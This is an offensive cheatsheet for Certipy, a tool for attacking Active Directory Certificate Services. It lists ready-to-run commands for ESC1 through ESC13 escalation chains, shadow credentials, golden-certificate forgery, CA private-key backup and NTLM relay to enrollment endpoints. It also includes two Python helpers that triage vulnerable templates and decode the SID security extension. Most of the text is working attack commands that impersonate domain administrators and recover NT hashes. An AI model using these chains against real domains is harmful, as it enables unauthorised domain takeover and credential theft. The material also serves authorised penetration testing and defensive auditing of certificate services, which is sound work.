Certipy-AD
Certipy-AD Cheatsheet
Installation
Using pip (the PyPI package is certipy-ad; the installed command is certipy, although Kali's apt package names the binary certipy-ad)
pip install certipy-ad
Using pipx
pipx install certipy-ad
From GitHub (latest)
git clone https://github.com/ly4k/Certipy.git
cd Certipy
pip install .
Authentication Methods
Password Authentication
certipy [command] -u $username@$domain -p $password -dc-ip $dc_ip
Hash Authentication (NTLM pass-the-hash; the LM half before the colon may stay empty)
certipy [command] -u $username@$domain -hashes :$ntlm_hash -dc-ip $dc_ip
Kerberos Authentication (the ticket is read from the ccache named in KRB5CCNAME; the target has to be given by hostname with -target so the service ticket's SPN resolves, an IP alone is not enough)
certipy [command] -u $username@$domain -k -no-pass -target $dc_hostname -dc-ip $dc_ip
PFX Certificate Authentication (PKINIT; see "Authentication with Certificates" below)
certipy auth -pfx $certificate.pfx -dc-ip $dc_ip
Enumeration
Find Certificate Templates and CAs (all)
certipy find -u $username@$domain -p $password -dc-ip $dc_ip
Vulnerable Templates and CAs Only
certipy find -u $username@$domain -p $password -dc-ip $dc_ip -vulnerable
Output Formats
# With no output flag, find writes both a text report ([timestamp]_Certipy.txt) and a JSON report ([timestamp]_Certipy.json)
# JSON file only
certipy find -u $username@$domain -p $password -dc-ip $dc_ip -json
# Text file only
certipy find -u $username@$domain -p $password -dc-ip $dc_ip -text
# Print the text report to the console instead of a file
certipy find -u $username@$domain -p $password -dc-ip $dc_ip -stdout
Show Only Enabled Templates
certipy find -u $username@$domain -p $password -dc-ip $dc_ip -enabled
Hide Administrator-Level Principals in the Permission Lists (makes low-privileged rights easier to spot)
certipy find -u $username@$domain -p $password -dc-ip $dc_ip -hide-admins
Collect via LDAP Only (no RPC/HTTP probing of the CAs; quieter, but the CA configuration, web-enrollment status and the ESC8/ESC11 checks are skipped)
certipy find -u $username@$domain -p $password -dc-ip $dc_ip -dc-only
Use LDAPS Instead of LDAP
certipy find -u $username@$domain -p $password -dc-ip $dc_ip -scheme ldaps
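The -vulnerable flag is only a filter; the decision behind it is a handful of checks on each template's flags, EKUs and ACLs. The script below, an added example that is not Certipy's own code, re-derives the ESC1, ESC2, ESC3, ESC4 and ESC9 template conditions from a find JSON report so the result can be audited or fed to another tool. The JSON key names ("Template Name", "Enrollee Supplies Subject", "Write Property Principals", the camel-case enrollment-flag names and so on) are assumed from the 4.x report format and should be checked against a real report; the two templates embedded in it are constructed sample data, not output from a real domain.

```python
"""Re-derive Certipy's ESC1/ESC2/ESC3/ESC4/ESC9 template checks from a `certipy find` JSON report.

Added example (not part of Certipy). Key names are assumed from the 4.x JSON report;
the templates in SAMPLE_REPORT are constructed sample data.
"""
import json

# Groups every domain principal belongs to; a right granted to one of them is
# effectively granted to any low-privileged user or computer.
LOW_PRIV = ("Domain Users", "Domain Computers", "Authenticated Users", "Everyone")

# EKUs that make a certificate usable for Kerberos PKINIT / Schannel logon.
CLIENT_AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
                    "Smart Card Logon", "Any Purpose"}
AGENT_EKU = "Certificate Request Agent"


def is_low_priv(principals):
    """True if any 'DOMAIN\\Group' string names a catch-all group."""
    return any(p.split("\\")[-1] in LOW_PRIV for p in principals)


def allows_client_auth(ekus):
    # An empty EKU list means "any purpose", which the KDC accepts for logon.
    return not ekus or bool(set(ekus) & CLIENT_AUTH_EKUS)


def classify_template(t):
    """Return the set of ESC identifiers a template satisfies."""
    findings = set()
    if not t.get("Enabled", False):
        return findings
    perms = t.get("Permissions", {})
    enroll = perms.get("Enrollment Permissions", {}).get("Enrollment Rights", [])
    ctl = perms.get("Object Control Permissions", {})
    ekus = t.get("Extended Key Usage", [])
    # A request that needs manager approval or a co-signature is not directly abusable.
    unattended = (not t.get("Requires Manager Approval", False)
                  and t.get("Authorized Signatures Required", 0) == 0)

    if unattended and is_low_priv(enroll):
        if t.get("Enrollee Supplies Subject", False) and allows_client_auth(ekus):
            findings.add("ESC1")  # requester chooses the SAN: impersonate anyone
        if not ekus or "Any Purpose" in ekus:
            findings.add("ESC2")  # any-purpose certificate, usable like an enrollment agent
        if AGENT_EKU in ekus:
            findings.add("ESC3")  # request certificates on behalf of other users
        if "NoSecurityExtension" in t.get("Enrollment Flag", []) and allows_client_auth(ekus):
            findings.add("ESC9")  # issued certificates lack the SID extension
    # ESC4: low-privileged principals can rewrite the template object itself.
    writers = [ctl["Owner"]] if ctl.get("Owner") else []
    for key in ("Write Owner Principals", "Write Dacl Principals", "Write Property Principals"):
        writers += ctl.get(key, [])
    if is_low_priv(writers):
        findings.add("ESC4")
    return findings


def triage(report):
    """Map template name -> sorted ESC list for every flagged template in a report."""
    out = {}
    for t in report.get("Certificate Templates", {}).values():
        found = classify_template(t)
        if found:
            out[t["Template Name"]] = sorted(found)
    return out


# Constructed sample report: one ESC1+ESC4 template and the stock "User" template.
SAMPLE_REPORT = json.loads(r'''
{ "Certificate Templates": {
  "0": { "Template Name": "VulnTemplate", "Enabled": true, "Enrollee Supplies Subject": true,
         "Requires Manager Approval": false, "Authorized Signatures Required": 0,
         "Extended Key Usage": ["Client Authentication"], "Enrollment Flag": ["PublishToDs"],
         "Permissions": { "Enrollment Permissions": { "Enrollment Rights": ["CORP.LOCAL\\Domain Users"] },
                          "Object Control Permissions": { "Owner": "CORP.LOCAL\\Enterprise Admins",
                          "Write Owner Principals": ["CORP.LOCAL\\Domain Admins"],
                          "Write Dacl Principals": ["CORP.LOCAL\\Domain Admins"],
                          "Write Property Principals": ["CORP.LOCAL\\Domain Users"] } } },
  "1": { "Template Name": "User", "Enabled": true, "Enrollee Supplies Subject": false,
         "Requires Manager Approval": false, "Authorized Signatures Required": 0,
         "Extended Key Usage": ["Client Authentication", "Secure Email", "Encrypting File System"],
         "Enrollment Flag": ["IncludeSymmetricAlgorithms", "PublishToDs", "AutoEnrollment"],
         "Permissions": { "Enrollment Permissions": { "Enrollment Rights": ["CORP.LOCAL\\Domain Users"] },
                          "Object Control Permissions": { "Owner": "CORP.LOCAL\\Enterprise Admins",
                          "Write Owner Principals": ["CORP.LOCAL\\Domain Admins"],
                          "Write Dacl Principals": ["CORP.LOCAL\\Domain Admins"],
                          "Write Property Principals": ["CORP.LOCAL\\Domain Admins"] } } } } }
''')

if __name__ == "__main__":
    for name, escs in triage(SAMPLE_REPORT).items():
        print(f"{name}: {', '.join(escs)}")
```

Point it at a real report with `triage(json.load(open("20240101000000_Certipy.json")))`. Note what it deliberately does not do: ESC6, ESC7, ESC8 and ESC11 are CA-level conditions found under "Certificate Authorities", and ESC13 needs the issuance-policy OID objects, so those still come from the tool's own output.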
Certificate Request
Request Certificate from Template (Certipy prints the request ID and saves the certificate and key as $username.pfx)
certipy req -u $username@$domain -p $password -ca $ca_name -template $template_name -dc-ip $dc_ip
Request with a UPN in the Subject Alternative Name (only honored when the template lets the enrollee supply the subject, or the CA has EDITF_ATTRIBUTESUBJECTALTNAME2 set)
certipy req -u $username@$domain -p $password -ca $ca_name -template $template_name -upn $target_user@$domain -dc-ip $dc_ip
Request with a DNS SAN (machine-style certificate, e.g. in the name of a domain controller)
certipy req -u $username@$domain -p $password -ca $ca_name -template $template_name -dns $dc_hostname.$domain -dc-ip $dc_ip
Request on Behalf of Another User (needs an enrollment agent certificate, see ESC3)
certipy req -u $username@$domain -p $password -ca $ca_name -template $template_name -on-behalf-of "$domain\\$target_user" -pfx $enrollment_agent.pfx -dc-ip $dc_ip
Request with a Custom Subject (the DC components are the domain's distinguished name, e.g. DC=corp,DC=local for corp.local; the DNS name itself is not a valid DN component)
certipy req -u $username@$domain -p $password -ca $ca_name -template $template_name -subject "CN=$target_user,CN=Users,DC=corp,DC=local" -dc-ip $dc_ip
Authentication with Certificates
Authenticate with PFX (PKINIT: obtains a TGT, saves it to $identity.ccache and, by default, also recovers the account's NT hash via Kerberos U2U)
certipy auth -pfx $certificate.pfx -dc-ip $dc_ip
Supply the Identity Explicitly (needed when the certificate carries no UPN or DNS SAN that Certipy can read, or after ESC9/ESC10 where the UPN has no domain suffix)
certipy auth -pfx $certificate.pfx -username $username -domain $domain -dc-ip $dc_ip
LDAP Shell with Certificate (authenticates to LDAPS with Schannel rather than Kerberos; the path to use when the KDC refuses the certificate but Schannel still maps it, as in ESC10 case 2)
certipy auth -pfx $certificate.pfx -ldap-shell -dc-ip $dc_ip
Get the TGT Only, Skip the NT Hash Retrieval
certipy auth -pfx $certificate.pfx -no-hash -dc-ip $dc_ip
Shadow Credentials (requires write access to the target's msDS-KeyCredentialLink attribute, e.g. GenericWrite or GenericAll on the account)
Add a Key Credential, Authenticate With It and Remove It Again (prints the TGT and NT hash; the .pfx it saves stops working once the key credential is gone)
certipy shadow auto -u $username@$domain -p $password -account $target_account -dc-ip $dc_ip
Add a Key Credential and Keep It (persistent; saves $target_account.pfx for later certipy auth)
certipy shadow add -u $username@$domain -p $password -account $target_account -dc-ip $dc_ip
List Key Credentials on an Account
certipy shadow list -u $username@$domain -p $password -account $target_account -dc-ip $dc_ip
Show One Key Credential (device ID taken from the list output)
certipy shadow info -u $username@$domain -p $password -account $target_account -device-id $device_id -dc-ip $dc_ip
Remove One Key Credential, or Clear Them All (clearing also deletes legitimate Windows Hello for Business keys on the account)
certipy shadow remove -u $username@$domain -p $password -account $target_account -device-id $device_id -dc-ip $dc_ip
certipy shadow clear -u $username@$domain -p $password -account $target_account -dc-ip $dc_ip
Golden Certificates (requires the CA's certificate and private key, e.g. from certipy ca -backup; forged certificates are never recorded in the CA database, so revocation and request auditing do not catch them)
Forge a Certificate for a User (the DC components are the domain's DN, e.g. DC=corp,DC=local)
certipy forge -ca-pfx $ca_certificate.pfx -upn $target_user@$domain -subject "CN=$target_user,CN=Users,DC=corp,DC=local"
Copy Extensions from an Existing Certificate (-template takes a certificate file to model the forgery on, not a template name)
certipy forge -ca-pfx $ca_certificate.pfx -upn administrator@$domain -template $existing_certificate.pfx
Forge with a Custom Serial Number
certipy forge -ca-pfx $ca_certificate.pfx -upn $target_user@$domain -serial $serial_number
Certificate Renewal
Renew an Existing Certificate (the current certificate and key are passed with -pfx; renewal keeps the identity, which is how a certificate obtained once can be kept alive across a password reset or a later template fix)
certipy req -u $username@$domain -p $password -ca $ca_name -template $template_name -renew -pfx $old_certificate.pfx -dc-ip $dc_ip
ESC1 - Enrollee Supplies Subject + Client Authentication
Request Certificate with Arbitrary SAN (the template lets the enrollee supply the subject, carries a client-authentication EKU, needs no manager approval or signatures, and low-privileged users can enroll)
certipy req -u $username@$domain -p $password -ca $ca_name -template $vulnerable_template -upn administrator@$domain -dc-ip $dc_ip
Authenticate with the ESC1 Certificate (Certipy names the file after the SAN identity)
certipy auth -pfx administrator.pfx -dc-ip $dc_ip
Caveat: a CA patched with KB5014754 (May 2022) stamps the requester's SID into the certificate's security extension, and a DC with StrongCertificateBindingEnforcement at 1 or 2 compares it with the account the SAN maps to and rejects the mismatch (KDC Event 41). PKINIT as administrator then fails unless enforcement is disabled (value 0) or the template also omits the extension (see ESC9).
ESC2 - Any Purpose EKU (or no EKU at all)
Request Certificate (the certificate is not restricted by EKU, so it can be used like an enrollment agent certificate to request on behalf of other users, see ESC3)
certipy req -u $username@$domain -p $password -ca $ca_name -template $esc2_template -dc-ip $dc_ip
ESC3 - Enrollment Agent Certificate
Request an Enrollment Agent Certificate (give the template's name, i.e. its CN such as the built-in EnrollmentAgent, not its display name "Enrollment Agent")
certipy req -u $username@$domain -p $password -ca $ca_name -template EnrollmentAgent -dc-ip $dc_ip
Request a Certificate on Behalf of Another User (the second template must accept agent-signed requests: a schema version 1 template such as User, or one requiring one authorized signature with the Certificate Request Agent policy; the CA must not restrict enrollment agents)
certipy req -u $username@$domain -p $password -ca $ca_name -template User -on-behalf-of "$domain\\Administrator" -pfx $enrollment_agent.pfx -dc-ip $dc_ip
ESC4 - Vulnerable Certificate Template ACLs
Overwrite the Template with an ESC1-Vulnerable Configuration (requires write access to the template object; with no -configuration given Certipy applies its built-in ESC1 configuration, and -save-old writes the current configuration to $template_name.json so it can be restored)
certipy template -u $username@$domain -p $password -template $template_name -save-old -dc-ip $dc_ip
Then request a certificate from it exactly as in ESC1 (-upn administrator@$domain) and restore the template afterwards
certipy template -u $username@$domain -p $password -template $template_name -configuration $template_name.json -dc-ip $dc_ip
ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 Set on the CA
Request Certificate with Arbitrary SAN from Any Client-Authentication Template (the CA honors a SAN passed as a request attribute for every template, so the stock User template suffices and no ESC1 template is needed)
certipy req -u $username@$domain -p $password -ca $ca_name -template User -upn administrator@$domain -dc-ip $dc_ip
Caveat: after KB5014754 the CA adds the requester's SID extension, so the same strong-mapping rejection as for ESC1 applies; ESC6 then only works against DCs with enforcement disabled or combined with the ESC10 conditions.
ESC7 - Vulnerable CA ACLs (Manage CA / Manage Certificates)
Add Yourself as an Officer (requires Manage CA; an officer holds the Manage Certificates right)
certipy ca -u $username@$domain -p $password -ca $ca_name -add-officer $username -dc-ip $dc_ip
Enable the Built-in SubCA Template on the CA (requires Manage CA; SubCA lets the enrollee supply the subject, but only administrators may enroll, so the request below is denied)
certipy ca -u $username@$domain -p $password -ca $ca_name -enable-template SubCA -dc-ip $dc_ip
Request a SubCA Certificate with the Target's UPN (denied; answer yes when Certipy offers to save the private key and note the request ID)
certipy req -u $username@$domain -p $password -ca $ca_name -template SubCA -upn administrator@$domain -dc-ip $dc_ip
Issue the Denied or Pending Request (requires Manage Certificates)
certipy ca -u $username@$domain -p $password -ca $ca_name -issue-request $request_id -dc-ip $dc_ip
Retrieve the Issued Certificate (Certipy pairs it with the saved key)
certipy req -u $username@$domain -p $password -ca $ca_name -retrieve $request_id -dc-ip $dc_ip
ESC8 - NTLM Relay to HTTP Enrollment (Web Enrollment installed, NTLM accepted, no Extended Protection)
Start the Relay Listener (Certipy appends /certsrv/certfnsh.asp itself; then coerce a machine account, typically a DC, into authenticating to your host, e.g. with PetitPotam or PrinterBug)
certipy relay -target "http://$ca_server" -template DomainController
Pick the Template for the Relayed Account (when -template is omitted Certipy uses Machine for accounts ending in $ and User otherwise; a DC can enroll in DomainController, a workstation in Machine)
certipy relay -target "http://$ca_server" -template $template_name -ca $ca_name
The relayed account's certificate is saved as a .pfx for certipy auth.
ESC9 - No Security Extension (the template has CT_FLAG_NO_SECURITY_EXTENSION, the DC's StrongCertificateBindingEnforcement is 0 or 1, and you hold GenericWrite over a victim account that may enroll in the template)
Step 1: Take over the victim with shadow credentials to obtain its NT hash
certipy shadow auto -u $username@$domain -p $password -account $victim -dc-ip $dc_ip
Step 2: Set the victim's UPN to the target's bare name (no @domain: the KDC resolves "Administrator" to Administrator@$domain, and the bare form avoids clashing with an existing UPN)
certipy account update -u $username@$domain -p $password -user $victim -upn Administrator -dc-ip $dc_ip
Step 3: Request the certificate as the victim (its UPN, now "Administrator", ends up in the SAN; the template omits the SID extension, so nothing ties the certificate back to the victim)
certipy req -u $victim@$domain -hashes :$victim_nt_hash -ca $ca_name -template $esc9_template -dc-ip $dc_ip
Step 4: Restore the victim's UPN so the account keeps working
certipy account update -u $username@$domain -p $password -user $victim -upn $victim@$domain -dc-ip $dc_ip
Step 5: Authenticate (the certificate's UPN has no domain suffix, so pass -domain)
certipy auth -pfx administrator.pfx -domain $domain -dc-ip $dc_ip
ESC10 - Weak Certificate Mapping Settings on the DC (same GenericWrite-over-a-victim setup as ESC9, but any client-authentication template such as User will do)
Case 1: StrongCertificateBindingEnforcement = 0 (Kerberos ignores the SID extension entirely; proceed as in ESC9 with the User template)
certipy shadow auto -u $username@$domain -p $password -account $victim -dc-ip $dc_ip
certipy account update -u $username@$domain -p $password -user $victim -upn Administrator -dc-ip $dc_ip
certipy req -u $victim@$domain -hashes :$victim_nt_hash -ca $ca_name -template User -dc-ip $dc_ip
certipy account update -u $username@$domain -p $password -user $victim -upn $victim@$domain -dc-ip $dc_ip
certipy auth -pfx administrator.pfx -domain $domain -dc-ip $dc_ip
Case 2: CertificateMappingMethods contains the UPN bit (0x4), so Schannel maps on UPN alone while Kerberos may still refuse the certificate; point the victim's UPN at a machine account and use Schannel through the LDAP shell (Certipy names the saved file after the UPN, e.g. dc$.pfx)
certipy account update -u $username@$domain -p $password -user $victim -upn "$target_computer\$@$domain" -dc-ip $dc_ip
certipy req -u $victim@$domain -hashes :$victim_nt_hash -ca $ca_name -template User -dc-ip $dc_ip
certipy account update -u $username@$domain -p $password -user $victim -upn $victim@$domain -dc-ip $dc_ip
certipy auth -pfx "$target_computer\$.pfx" -ldap-shell -dc-ip $dc_ip
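ESC9 and ESC10 both turn on one certificate extension: szOID_NTDS_CA_SECURITY_EXT (1.3.6.1.4.1.311.25.2), which a patched CA fills with the requester's SID and which the KDC compares with the account the SAN maps to. The code below is an added example, not Certipy's: it encodes and decodes that extension value with a minimal DER codec so a certificate exported with certipy cert can be checked for the extension's presence and content before spending an authentication attempt. The layout (an OtherName whose type-id is szOID_NTDS_OBJECTSID, 1.3.6.1.4.1.311.25.2.1, and whose value is an OCTET STRING holding the SID text) is the one Microsoft documents for the extension; the SIDs used are constructed sample values.

```python
"""Encode/decode the szOID_NTDS_CA_SECURITY_EXT (1.3.6.1.4.1.311.25.2) extension value.

Added example, not Certipy code. The extension is an OtherName: SEQUENCE { [0] {
OID 1.3.6.1.4.1.311.25.2.1, [0] { OCTET STRING "S-1-5-21-..." } } }. Sample SIDs are constructed.
"""

OID_NTDS_CA_SECURITY_EXT = "1.3.6.1.4.1.311.25.2"
OID_NTDS_OBJECTSID = "1.3.6.1.4.1.311.25.2.1"
TAG_SEQUENCE, TAG_OID, TAG_OCTET_STRING, TAG_CTX0 = 0x30, 0x06, 0x04, 0xA0


def _der_len(n):
    """DER length: short form below 128, otherwise 0x80|count followed by big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _der_len(len(body)) + body


def _encode_oid(dotted):
    """Dotted OID -> DER OBJECT IDENTIFIER (first two arcs packed, remaining arcs base-128)."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(TAG_OID, bytes(out))


def _read_tlv(data):
    """Parse one TLV; return (tag, value, remaining bytes)."""
    tag, first = data[0], data[1]
    if first < 0x80:
        length, pos = first, 2
    else:
        count = first & 0x7F
        length, pos = int.from_bytes(data[2:2 + count], "big"), 2 + count
    return tag, data[pos:pos + length], data[pos + length:]


def build_security_ext(sid):
    """Extension value a patched CA places in a certificate issued to the account with this SID."""
    sid_value = _tlv(TAG_CTX0, _tlv(TAG_OCTET_STRING, sid.encode("ascii")))
    other_name = _tlv(TAG_CTX0, _encode_oid(OID_NTDS_OBJECTSID) + sid_value)
    return _tlv(TAG_SEQUENCE, other_name)


def parse_security_ext(der):
    """Return the SID string carried by an extension value; ValueError if the layout is off."""
    tag, other_name, rest = _read_tlv(der)
    if tag != TAG_SEQUENCE or rest:
        raise ValueError("expected a single SEQUENCE")
    tag, body, rest = _read_tlv(other_name)
    if tag != TAG_CTX0 or rest:
        raise ValueError("expected OtherName [0]")
    tag, oid, rest = _read_tlv(body)
    if tag != TAG_OID or _tlv(TAG_OID, oid) != _encode_oid(OID_NTDS_OBJECTSID):
        raise ValueError("type-id is not szOID_NTDS_OBJECTSID")
    tag, ctx, rest = _read_tlv(rest)
    if tag != TAG_CTX0 or rest:
        raise ValueError("expected [0] EXPLICIT value")
    tag, sid, rest = _read_tlv(ctx)
    if tag != TAG_OCTET_STRING or rest:
        raise ValueError("expected OCTET STRING")
    return sid.decode("ascii")


def mapping_check(ext_der, mapped_account_sid):
    """Mimic the KDC's SID-extension decision (KB5014754): no extension -> only a weak UPN/DNS
    mapping is possible (Event 39; what ESC9/ESC10 rely on); present but different -> rejected
    (Event 41); equal -> strong mapping."""
    if ext_der is None:
        return "no-extension"
    return "match" if parse_security_ext(ext_der) == mapped_account_sid else "mismatch"


if __name__ == "__main__":
    ext = build_security_ext("S-1-5-21-1111111111-2222222222-3333333333-1105")  # constructed SID
    print(ext.hex())
    print(parse_security_ext(ext))
    print(mapping_check(ext, "S-1-5-21-1111111111-2222222222-3333333333-500"))
```

To inspect a real certificate, export it with certipy cert -pfx x.pfx -nokey -out x.crt, locate the 1.3.6.1.4.1.311.25.2 extension with openssl x509 -text or openssl asn1parse, and pass its raw value to parse_security_ext. An ESC9 template's certificate has no such extension at all, which is precisely why the UPN swap in ESC9 works.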
ESC11 - NTLM Relay to the RPC Enrollment Interface (the CA lacks the IF_ENFORCEENCRYPTICERTREQUEST flag, so ICPR requests without RPC encryption are accepted)
Relay NTLM to ICPR over RPC (-ca is required here because the CA name is part of the RPC request)
certipy relay -target "rpc://$ca_server" -ca $ca_name -template $template_name
ESC13 - Issuance Policy Linked to a Group (the template carries an issuance policy OID whose msPKI-Enterprise-Oid object has msDS-OIDToGroupLink set; a certificate from it makes the KDC add that group to the ticket's PAC)
Request Certificate from the Template (find reports the linked group; the template must allow client authentication and your account must be able to enroll)
certipy req -u $username@$domain -p $password -ca $ca_name -template $template_with_oid -dc-ip $dc_ip
Authenticate; the TGT now carries the linked group's membership
certipy auth -pfx $username.pfx -dc-ip $dc_ip
Certificate Operations
Strip the Password from a PFX (Certipy's other commands expect an unprotected PFX; -password is the password of the input file, the exported file has none)
certipy cert -pfx $protected.pfx -password $pfx_password -export -out $unprotected.pfx
Export Key and Certificate as Separate PEM Files
certipy cert -pfx $certificate.pfx -nocert -out $key.key
certipy cert -pfx $certificate.pfx -nokey -out $cert.crt
Build a PFX from a PEM Certificate and Key
certipy cert -cert $cert.pem -key $key.pem -export -out $output.pfx
Account Operations (certipy account read/create/update/delete; the updates below need write access to the target object)
Update User Principal Name
certipy account update -u $username@$domain -p $password -user $target_user -upn newupn@$domain -dc-ip $dc_ip
Update a Computer's dNSHostName (since the CVE-2022-26923 "Certifried" fixes the DC validates the name and the CA embeds the account's SID, so renaming a machine account after a DC no longer yields a DC certificate by itself)
certipy account update -u $username@$domain -p $password -user 'COMPUTER$' -dns attacker.$domain -dc-ip $dc_ip
Update Service Principal Names
certipy account update -u $username@$domain -p $password -user $target_user -spns HTTP/attacker.$domain -dc-ip $dc_ip
Read an Account's Attributes
certipy account read -u $username@$domain -p $password -user $target_user -dc-ip $dc_ip
CA Operations (the CAs themselves are listed by certipy find)
List the Templates Enabled on a CA
certipy ca -u $username@$domain -p $password -ca $ca_name -list-templates -dc-ip $dc_ip
Enable or Disable a Template on the CA (requires Manage CA)
certipy ca -u $username@$domain -p $password -ca $ca_name -enable-template $template_name -dc-ip $dc_ip
certipy ca -u $username@$domain -p $password -ca $ca_name -disable-template $template_name -dc-ip $dc_ip
Back Up the CA Certificate and Private Key (requires administrative rights on the CA host; writes $ca_name.pfx for use with certipy forge)
certipy ca -u $username@$domain -p $password -ca $ca_name -backup -dc-ip $dc_ip
Template Operations (certipy template writes a template's configuration; it never just displays it, so read templates with certipy find, which dumps every template's flags, EKUs and ACLs)
Overwrite a Template with Certipy's ESC1-Vulnerable Configuration and Keep a Backup (modifies the template; requires write access to it, see ESC4)
certipy template -u $username@$domain -p $password -template $template_name -save-old -dc-ip $dc_ip
Apply a Saved Configuration (restores the backup written by -save-old)
certipy template -u $username@$domain -p $password -template $template_name -configuration $template_name.json -dc-ip $dc_ip
ADCS Relay (prerequisites under ESC8 and ESC11)
HTTP Endpoint (Web Enrollment; Certipy appends /certsrv/certfnsh.asp)
certipy relay -target "http://$ca_server" -template $template_name -ca $ca_name
RPC Endpoint (ICPR; -ca is required)
certipy relay -target "rpc://$ca_server" -template $template_name -ca $ca_name
Keep Listening After the First Successful Relay
certipy relay -target "http://$ca_server" -template $template_name -ca $ca_name -forever
Useful Combinations
Full ESC1 Attack Chain
# 1. Find vulnerable templates
certipy find -u $username@$domain -p $password -vulnerable -dc-ip $dc_ip
# 2. Request a certificate with the administrator's UPN in the SAN
certipy req -u $username@$domain -p $password -ca $ca_name -template $vulnerable_template -upn administrator@$domain -dc-ip $dc_ip
# 3. Authenticate with it (TGT and NT hash)
certipy auth -pfx administrator.pfx -dc-ip $dc_ip
Full Shadow Credentials Attack
# 1. shadow auto adds a key credential, authenticates (TGT saved, NT hash printed) and removes the key credential again; the .pfx it leaves behind is useless afterwards
certipy shadow auto -u $username@$domain -p $password -account "$target_computer\$" -dc-ip $dc_ip
# 2. For a reusable certificate, add the key credential and keep it, then authenticate with the saved .pfx (file name as printed by shadow add)
certipy shadow add -u $username@$domain -p $password -account "$target_computer\$" -dc-ip $dc_ip
certipy auth -pfx "$target_computer\$.pfx" -dc-ip $dc_ip
ESC7 Full Chain
# 1. Add yourself as officer (Manage CA grants you Manage Certificates)
certipy ca -u $username@$domain -p $password -ca $ca_name -add-officer $username -dc-ip $dc_ip
# 2. Enable the SubCA template (Manage CA)
certipy ca -u $username@$domain -p $password -ca $ca_name -enable-template SubCA -dc-ip $dc_ip
# 3. Request a SubCA certificate with the administrator's UPN; the request is denied, answer yes to saving the private key and note the request ID
certipy req -u $username@$domain -p $password -ca $ca_name -template SubCA -upn administrator@$domain -dc-ip $dc_ip
# 4. Issue the denied request (Manage Certificates)
certipy ca -u $username@$domain -p $password -ca $ca_name -issue-request $request_id -dc-ip $dc_ip
# 5. Retrieve the issued certificate (Certipy pairs it with the saved key)
certipy req -u $username@$domain -p $password -ca $ca_name -retrieve $request_id -dc-ip $dc_ip
Important Notes¶
Common Variables:
$domain= Domain name (e.g., corp.local)$username= Your username$password= Your password$ca_name= Certificate Authority name (e.g., CORP-CA)$template_name= Certificate template name$dc_ip= Domain Controller IP address$ca_server= CA server hostname/IP$target_user= Target username for impersonation$ntlm_hash= NTLM hash (32 hex characters)
Output Files:
- Default output:
[timestamp]_Certipy.txt(find command) - Certificates:
[username].pfxor[username].crtand[username].key - JSON output:
[timestamp]_Certipy.json
Authentication Priority:
- Kerberos ticket (if
-kis specified) - NTLM hash (if
-hashesis specified) - Password (if
-pis specified) - Certificate (if
-pfxis specified)
Common Vulnerable Templates:
- ESC1: Client Authentication + ENROLLEE_SUPPLIES_SUBJECT
- ESC2: Any Purpose EKU
- ESC3: Certificate Request Agent
- ESC4: Write permissions on template
- ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 flag on CA
Useful Flags:
-debug- Enable debug output-no-pass- Don't ask for password (Kerberos)-ldaps- Use LDAPS instead of LDAP-silent- Reduce output verbosity-scheme- LDAP scheme (ldap/ldaps/gc/gcs)-ns- Nameserver for DNS resolution-dns-tcp- Use TCP for DNS queries-timeout- Timeout for connections
PFX Password:
- Default password for generated PFX files is usually empty or "Certipy"
- Use
-pfx-passwordto specify custom password when creating PFX
Time Synchronization:
- Ensure time sync with DC (within 5 minutes)
- Use
ntpdate $dc_iporrdate -n $dc_ipif needed
Certificate Validity:
- Certificates are typically valid for 1-2 years
- Check with
openssl x509 -in cert.crt -text -noout
Troubleshooting:
- Use
-debugflag for detailed error messages - Check Kerberos tickets with
klist - Verify connectivity with
ldapsearchorrpcclient - Ensure proper DNS resolution for domain and DC